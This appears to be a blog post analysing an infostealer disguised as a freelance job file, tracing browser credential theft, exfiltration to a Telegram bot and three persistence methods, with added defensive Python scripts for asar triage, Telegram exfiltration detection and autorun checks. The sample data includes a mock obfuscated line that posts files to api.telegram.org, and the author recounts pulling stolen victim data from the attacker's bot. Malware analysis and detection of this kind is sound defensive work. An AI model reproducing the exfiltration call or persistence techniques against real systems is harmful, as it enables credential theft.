In-Depth Malware Analysis of Nova Stealer v12.5: Uncovering the Threat Behind ‘Manage Facebook ads strategy.exe’

Ahmed Algohary
6 min read · Jul 13, 2024


So, one of my friends got a job offer on one of the freelance websites. The job offeror sent him a file, an exe file, as a work-related file. My friend was suspicious because the job offeror refused to send the file through the platform and instead sent a download link to my friend's personal email, so my friend asked me to analyze the executable and see what it's actually doing. BTW, he didn't open it; he didn't even extract it on his PC. He used a sandbox and an isolated PC to extract the zip file.

Starting with static analysis:

Extracting the zip file.

File hash

The first step I did was to upload the file to VirusTotal.

No detection.

I took a look at the file version.

It looks disgustingly legit, but if you search for Hihi you won't find anything about it; the copyright, though, is from Git, which makes it look more legit.

Using file to find out the file type.

It is a Nullsoft installer file, so now I am going to extract it using 7z.

Extracting app-64.7z.

Looks like we got another executable file; let's upload it to VirusTotal.

Also no detection.

We got some imports which look suspicious, like ws2_32.dll, which is used to run JavaScript code; ffmpeg.dll is an external DLL that is inside the installer.

We can see here the functions used from ws2_32.dll, which look suspicious: connect, gethostname, bind and getaddrinfo, which are obviously used in network communications.

We can see here also that winhttp.dll is used, which is used in HTTP communication.

In the resources folder we can find another executable, elevate.exe.

We can see here that it uses shell32.dll and ShellExecuteExW, which is used in Windows to run commands.

BTW, app.asar is a compressed Electron project that contains all the code used in the Electron project. After extracting it, it contained a heavily obfuscated JavaScript file that is probably the malicious code, but it was too obfuscated to deobfuscate.
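Because app.asar is where the real logic of an Electron app lives, it is worth being able to open one without the asar CLI. The following is an added example, not code from the post or from the analyzed sample: a small parser for the asar container (a JSON header tree behind two Chromium-style pickle headers, followed by the raw file contents), plus a triage pass that flags JavaScript entries that look obfuscated or reference api.telegram.org. The sample archive is constructed in memory from made-up files; the obfuscation heuristic is my own assumption and only a first filter, not a verdict.

```python
import json
import struct

# Constructed sample contents (not taken from the real installer): a benign
# entry point and a file that mimics the obfuscator output described above.
SAMPLE_FILES = {
    "package.json": b'{"name": "demo", "main": "main.js"}',
    "main.js": b"const { app } = require('electron');\napp.whenReady().then(() => {});\n",
    "dist/payload.js": (
        b"var _0x1a2b=['\\x68\\x74\\x74\\x70\\x73'];"
        b"(function(_0x3c4d,_0x5e6f){var _0x7a8b=function(_0x9c0d){while(--_0x9c0d){"
        b"_0x3c4d['push'](_0x3c4d['shift']());}};})(_0x1a2b,0x1f3);"
        b"fetch('https://api.telegram.org/bot<BOT_TOKEN_PLACEHOLDER>/sendDocument');"
    ),
}


def build_asar(files: dict) -> bytes:
    """Assemble an asar archive from {path: bytes}. Used only to create test
    input here; the layout mirrors what parse_asar() below expects."""
    root = {"files": {}}
    blob = bytearray()
    for path, data in files.items():
        node = root
        parts = path.split("/")
        for part in parts[:-1]:
            node = node["files"].setdefault(part, {"files": {}})
        node["files"][parts[-1]] = {"size": len(data), "offset": str(len(blob))}
        blob += data
    header_json = json.dumps(root).encode()
    # Chromium pickle: uint32 payload length, payload, zero padding to 4 bytes.
    str_pickle = struct.pack("<I", len(header_json)) + header_json
    str_pickle += b"\0" * (-len(str_pickle) % 4)
    header_pickle = struct.pack("<I", len(str_pickle)) + str_pickle
    return struct.pack("<II", 4, len(header_pickle)) + header_pickle + bytes(blob)


def parse_asar(data: bytes):
    """Return (header_tree, data_base) for an asar blob.
    Layout: [u32 4][u32 header_size][u32 string_pickle_size][u32 json_len][json...]
    and file contents start at 8 + header_size."""
    if len(data) < 16:
        raise ValueError("too short to be an asar archive")
    size_field, header_size, _, json_len = struct.unpack_from("<IIII", data, 0)
    if size_field != 4 or 16 + json_len > 8 + header_size or 8 + header_size > len(data):
        raise ValueError("malformed asar header")
    header = json.loads(data[16:16 + json_len].decode("utf-8"))
    return header, 8 + header_size


def list_files(node: dict, prefix: str = "") -> dict:
    """Flatten the header tree into {path: (offset, size)}. Directories carry a
    'files' key; entries shipped in app.asar.unpacked have no offset and are skipped."""
    out = {}
    for name, entry in node.get("files", {}).items():
        path = prefix + name
        if "files" in entry:
            out.update(list_files(entry, path + "/"))
        elif "offset" in entry:
            out[path] = (int(entry["offset"]), int(entry["size"]))
    return out


def extract(data: bytes, path: str) -> bytes:
    """Return the raw bytes of one entry, checking it lies inside the archive."""
    header, base = parse_asar(data)
    offset, size = list_files(header)[path]
    chunk = data[base + offset: base + offset + size]
    if len(chunk) != size:
        raise ValueError(f"{path}: entry runs past end of archive")
    return chunk


def looks_obfuscated(js: bytes) -> bool:
    """Heuristic only (my assumption, not a definitive test): _0x-style names,
    hex-escaped string tables and very long lines are typical obfuscator output."""
    text = js.decode("utf-8", errors="replace")
    longest = max((len(line) for line in text.splitlines()), default=0)
    return text.count("_0x") >= 5 or text.count("\\x") >= 8 or longest > 2000


EXFIL_MARKERS = (b"api.telegram.org",)  # the channel observed in this post


def triage(data: bytes) -> list:
    """Return [(path, [reasons])] for entries worth a closer look."""
    header, base = parse_asar(data)
    findings = []
    for path, (offset, size) in list_files(header).items():
        content = data[base + offset: base + offset + size]
        reasons = []
        if path.endswith(".js") and looks_obfuscated(content):
            reasons.append("obfuscated JavaScript")
        reasons += [f"references {m.decode()}" for m in EXFIL_MARKERS if m in content]
        if reasons:
            findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_asar(SAMPLE_FILES)
    for path, reasons in triage(blob):
        print(path, "->", "; ".join(reasons))
```

Run it with a real app.asar as the first argument to list the entries that deserve manual review; without an argument it runs against the constructed sample. Entries that live in app.asar.unpacked are listed in the header without an offset, so they must be read from that sibling directory rather than from the archive.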

I didn't use a decompiler on hihi.exe because it is pretty big (165MB) and I am sure it will be heavily obfuscated, so it was not worth it.

Gibberish in strings; we cannot see any readable strings.

Now for the dynamic analysis.

I used some common monitoring tools:

ProcWatch, DirWatch, Procmon, Process Hacker 2, Microsoft Netmon 3.4 and Wireshark.

Another thing I found: it disables Task Manager.

DirWatch shows it interacting with browser data like Login Data, which obviously means I am dealing with an infostealer. We can see the last zip file saved in Temp; let's go there.

Inside the zip file.

And then we can confirm that credentials are being exfilled.

Ofc I am running the malware in a sandbox VM, so nothing was in those files.

Now I know the main objective of this malware; next, let's find out how it sends that data.

I used Netmon to capture the malware's traffic.

I found a domain, and it is an API related to the malware; it's probably an API-based C2.

I visited it.

Clearly an API.

We can see it communicated with api.telegram.org, which adversaries commonly use to send exfiltrated data to a Telegram chat or bot.

Process Hacker 2 has a feature that lets you read the strings of a process while it is running, which is very useful because an obfuscated program becomes deobfuscated once it gets loaded in memory.

Searching for the string telegram.

I found a Telegram bot token and a chat ID, which identify the bot that receives the exfilled data.

Using a Telegram OSINT tool to get more info about a Telegram bot, I was able to identify the bot used to receive and store the stolen data from all victims, and I was able to download some data from the bot chat.

Some data I downloaded from the chat.
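The two artifacts that gave this away, a POST to api.telegram.org from an unexpected process and a bot token sitting in process memory, are both easy to hunt for on the defender's side. This is an added example, not code from the post: it runs the check over constructed proxy log lines in key=value form and over constructed strings-dump lines, and reports the bot ID with the token secret masked so the finding can be ticketed without copying a live credential. The token pattern (numeric bot ID, colon, 35-character secret) is the one commonly used by secret scanners and is assumed here, as is the log format.

```python
import re
from urllib.parse import urlparse

# Bot token shape commonly used by secret scanners: numeric bot id, a colon,
# then a 35-character secret. Assumed here, not taken from the post.
BOT_TOKEN_RE = re.compile(r"(?<![\w-])(\d{8,10}):([A-Za-z0-9_-]{35})(?![\w-])")
BOT_PATH_RE = re.compile(r"^/bot(\d{8,10}):([A-Za-z0-9_-]{35})/(\w+)")

# Constructed values; the secret is a placeholder of the right length, not a real token.
FAKE_SECRET = "AAEXAMPLE" + "0123456789abcdefghijklmnop"
FAKE_CHAT_ID = "-1001234567890"

SAMPLE_PROXY_LINES = [  # constructed web-proxy records in key=value form
    "ts=2024-07-13T10:01:02Z host=WS-17 proc=hihi.exe method=POST "
    f"url=https://api.telegram.org/bot1234567890:{FAKE_SECRET}/sendDocument status=200 bytes=48213",
    "ts=2024-07-13T10:01:05Z host=WS-17 proc=svchost.exe method=GET "
    "url=https://update.example.com/check status=200 bytes=512",
    "ts=2024-07-13T10:02:11Z host=WS-04 proc=chrome.exe method=GET "
    "url=https://telegram.org/ status=200 bytes=9981",
]

SAMPLE_MEMORY_STRINGS = [  # constructed lines like a Process Hacker strings dump
    "https://api.telegram.org/bot",
    f"1234567890:{FAKE_SECRET}",
    f"chat_id={FAKE_CHAT_ID}",
    "Login Data",
]


def mask(secret: str) -> str:
    """Keep a short prefix for correlation; never write the full secret out."""
    return secret[:4] + "*" * (len(secret) - 4)


def parse_kv(line: str) -> dict:
    """Turn 'k=v k=v ...' into a dict (values contain no spaces in this format)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def detect_telegram_exfil(lines) -> list:
    """Flag requests to the Telegram Bot API; a POST to sendDocument/sendMessage
    from a non-messaging process is rated high. Whether it is benign depends on
    the host's role, so the finding carries host and process for triage."""
    findings = []
    for line in lines:
        rec = parse_kv(line)
        url = urlparse(rec.get("url", ""))
        if url.hostname != "api.telegram.org":
            continue
        m = BOT_PATH_RE.match(url.path)
        if not m:
            continue
        bot_id, secret, api_method = m.groups()
        upload = rec.get("method") == "POST" and api_method in ("sendDocument", "sendMessage")
        findings.append({
            "ts": rec.get("ts"), "host": rec.get("host"), "proc": rec.get("proc"),
            "bot_id": bot_id, "token": f"{bot_id}:{mask(secret)}", "method": api_method,
            "bytes": int(rec.get("bytes", 0)),
            "severity": "high" if upload else "medium",
        })
    return findings


def find_bot_tokens(strings) -> list:
    """Return masked bot tokens found in a strings dump (memory or file)."""
    hits = []
    for s in strings:
        for bot_id, secret in BOT_TOKEN_RE.findall(s):
            hits.append(f"{bot_id}:{mask(secret)}")
    return hits


if __name__ == "__main__":
    for f in detect_telegram_exfil(SAMPLE_PROXY_LINES):
        print(f"[{f['severity']}] {f['ts']} {f['host']} {f['proc']} -> bot {f['bot_id']} {f['method']} ({f['bytes']} bytes)")
    print("tokens in memory:", find_bot_tokens(SAMPLE_MEMORY_STRINGS))
```

The bot ID is enough to correlate sightings across hosts and to report the bot for takedown; the secret itself is of no use to a defender, which is why the output never contains it. On fleets where no process has a business reason to talk to the Bot API, the hostname match alone is a reasonable block-and-alert rule at the proxy.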

Next question is does this malware use any persistence techniques?

Yes, it does; let's see how.

It is adding itself to Startup so it will be executed on every startup.

And it adds itself to CurrentVersion/Run to run on every login.

We can see here that it also adds itself to Scheduled Tasks to run on every logon.
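All three persistence locations seen here (the Run key, a logon scheduled task, and the Startup folder) can be checked from exported artifacts rather than on the live box, which is how I would do it during incident triage. The following is an added example, not from the post: it parses a constructed .reg export of the Run key and a constructed scheduled-task XML (the shape `schtasks /query /xml` produces, with the UTF-16 declaration left out so the sample stays inline), plus a small constructed map of Startup-folder shortcuts to their resolved targets, and flags every entry whose command lives in a user-writable location such as %TEMP% or AppData. The task name and paths are made up for the sample.

```python
import re
import xml.etree.ElementTree as ET

# Constructed artifacts (not from the real infection). A real export comes from
# `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" run.reg` (UTF-16)
# and `schtasks /query /tn <name> /xml`; decode those before parsing.
RUN_KEY_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"Hihi"="\"C:\\Users\\victim\\AppData\\Local\\Temp\\hihi.exe\""
'''

TASK_XML = '''<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\\Users\\victim\\AppData\\Local\\Temp\\hihi.exe</Command></Exec>
  </Actions>
</Task>'''

# Startup-folder shortcuts mapped to their resolved targets (resolution of .lnk
# files is assumed to have been done elsewhere; None = not a shortcut).
STARTUP_TARGETS = {
    "hihi.lnk": r"C:\Users\victim\AppData\Local\Temp\hihi.exe",
    "desktop.ini": None,
}

# Locations a standard user can write to; autoruns pointing here deserve a look.
USER_WRITABLE = re.compile(
    r"%TEMP%|%APPDATA%|%LOCALAPPDATA%|\\AppData\\|\\Temp\\|\\Users\\[^\\]+\\Downloads\\",
    re.I,
)
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def parse_run_key(reg_text: str) -> dict:
    """Parse "name"="value" lines of a .reg export, undoing its \\ and \" escapes."""
    entries = {}
    for m in re.finditer(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$', reg_text, re.M):
        name, value = (s.replace('\\"', '"').replace("\\\\", "\\") for s in m.groups())
        entries[name] = value
    return entries


def parse_task(xml_text: str) -> dict:
    """Pull the trigger type and Exec commands out of a Task Scheduler XML."""
    root = ET.fromstring(xml_text)
    logon = root.find("t:Triggers/t:LogonTrigger", TASK_NS) is not None
    commands = [c.text or "" for c in root.findall("t:Actions/t:Exec/t:Command", TASK_NS)]
    return {"logon_trigger": logon, "commands": commands}


def triage_persistence(reg_text: str, task_xmls: dict, startup_targets: dict) -> list:
    """Return findings for autoruns whose command points into a user-writable path."""
    findings = []
    for name, cmd in parse_run_key(reg_text).items():
        if USER_WRITABLE.search(cmd):
            findings.append({"source": "HKCU Run", "name": name, "command": cmd})
    for task_name, xml_text in task_xmls.items():
        task = parse_task(xml_text)
        source = "scheduled task" + (" (logon)" if task["logon_trigger"] else "")
        for cmd in task["commands"]:
            if USER_WRITABLE.search(cmd):
                findings.append({"source": source, "name": task_name, "command": cmd})
    for lnk, target in startup_targets.items():
        if target and USER_WRITABLE.search(target):
            findings.append({"source": "Startup folder", "name": lnk, "command": target})
    return findings


if __name__ == "__main__":
    for f in triage_persistence(RUN_KEY_EXPORT, {"Hihi": TASK_XML}, STARTUP_TARGETS):
        print(f"{f['source']:24} {f['name']:12} {f['command']}")
```

The OneDrive entry under Program Files is left alone while the three hihi.exe autoruns are reported, which matches what the post observed. The same three sources are also where cleanup has to happen: deleting the binary from Temp without removing the Run value, the task and the shortcut leaves broken autoruns that will happily relaunch a re-dropped copy.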

The End.

Ahmed Algohary

Penetration Tester | eJPT | eCPPTv2 | HTB Dante | 0x1 CVE